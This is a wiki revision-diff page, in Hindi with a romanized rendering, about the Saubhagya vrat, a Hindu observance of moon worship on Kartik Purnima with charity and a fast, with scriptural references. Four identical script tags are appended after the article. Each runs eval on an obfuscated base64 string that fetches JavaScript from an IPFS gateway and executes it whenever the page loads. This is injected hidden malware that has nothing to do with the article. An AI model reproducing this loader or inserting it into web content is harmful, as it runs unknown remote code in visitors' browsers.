Difference between revisions of "सौभाग्य व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*सौभाग्यव्रत में [[कार्तिक]] [[पूर्णिमा]] पर 16 दलों वाले चित्रित [[कमल]] के [[बीजकोष]] पर स्थापित [[चंद्र देव|चन्द्र]] प्रतिमा की पूजा करनी चाहिए।
 
*सौभाग्यव्रत में [[कार्तिक]] [[पूर्णिमा]] पर 16 दलों वाले चित्रित [[कमल]] के [[बीजकोष]] पर स्थापित [[चंद्र देव|चन्द्र]] प्रतिमा की पूजा करनी चाहिए।
*कमल के किजल्कों (अंशुओं) पर 28 [[नक्षत्र|नक्षत्रों]] (अभिजित् को लेकर) की पूजा करनी चाहिए।
+
*कमल के किजल्कों (अंशुओं) पर 28 [[नक्षत्र|नक्षत्रों]] ([[अभिजित नक्षत्र|अभिजित]] को लेकर) की पूजा करनी चाहिए।
 
*पत्तियों पर तिथियों एवं उनके स्वामियों की पूजा करनी चाहिए।
 
*पत्तियों पर तिथियों एवं उनके स्वामियों की पूजा करनी चाहिए।
 
*व्रत के अन्त में दो वस्त्रों का दान देना चाहिए।
 
*व्रत के अन्त में दो वस्त्रों का दान देना चाहिए।
Line 14: Line 14:
 
*[[पंचमी]] पर चन्द्र का पूजक दीर्घायु, धन एवं यश पाता है।<ref>हेमाद्रि (व्रत खण्ड 1, 574, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>
 
*[[पंचमी]] पर चन्द्र का पूजक दीर्घायु, धन एवं यश पाता है।<ref>हेमाद्रि (व्रत खण्ड 1, 574, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{पर्व और त्योहार}}
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{व्रत और उत्सव}}
 
  
 
[[Category:व्रत और उत्सव]]
 
[[Category:व्रत और उत्सव]]

Latest revision as of 13:19, 14 January 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • saubhagyavrat mean kartik poornima par 16 daloan vale chitrit kamal ke bijakosh par sthapit chandr pratima ki pooja karani chahie.
  • kamal ke kijalkoan (aanshuoan) par 28 nakshatroan (abhijit ko lekar) ki pooja karani chahie.
  • pattiyoan par tithiyoan evan unake svamiyoan ki pooja karani chahie.
  • vrat ke ant mean do vastroan ka dan dena chahie.
  • das din upavas ya nakt rahana chahie.
  • is vrat se kalyan, saundary evan sambhog anand ki prapti hoti hai.[1]
  • ek varsh tak phalgun evan age ki tritiya par namak ka tyag karana chahie.
  • ant mean ek ghar evan palang ka sari samagriyoan ke sath dan tatha 'parvati mujh par prasann hoan' ke sath ek sapatnik brahman ka samman karana chahie.
  • karta gaurilok vasi ho jata hai.
  • saubhagyavrat tithivrat; devata gauri haian.[2]
  • varshakriyakaumudi[3], yahaan 'lavanamh' ke sthan par 'shayanamh' aya hai.
  • agni puran[4] mean bhi yahi shlok hai.
  • panchami par chandr ka poojak dirghayu, dhan evan yash pata hai.[5]


tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 235-236, vishnudharmottarapuran se uddharan
  2. krityakalpataru (vrat khand 441, matsy puran 101|15-16); hemadri (vrat khand 1, 483, garu d puran se uddharan
  3. varshakriyakaumudi 29-30
  4. agni puran 178224-25
  5. hemadri (vrat khand 1, 574, vishnudharmottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>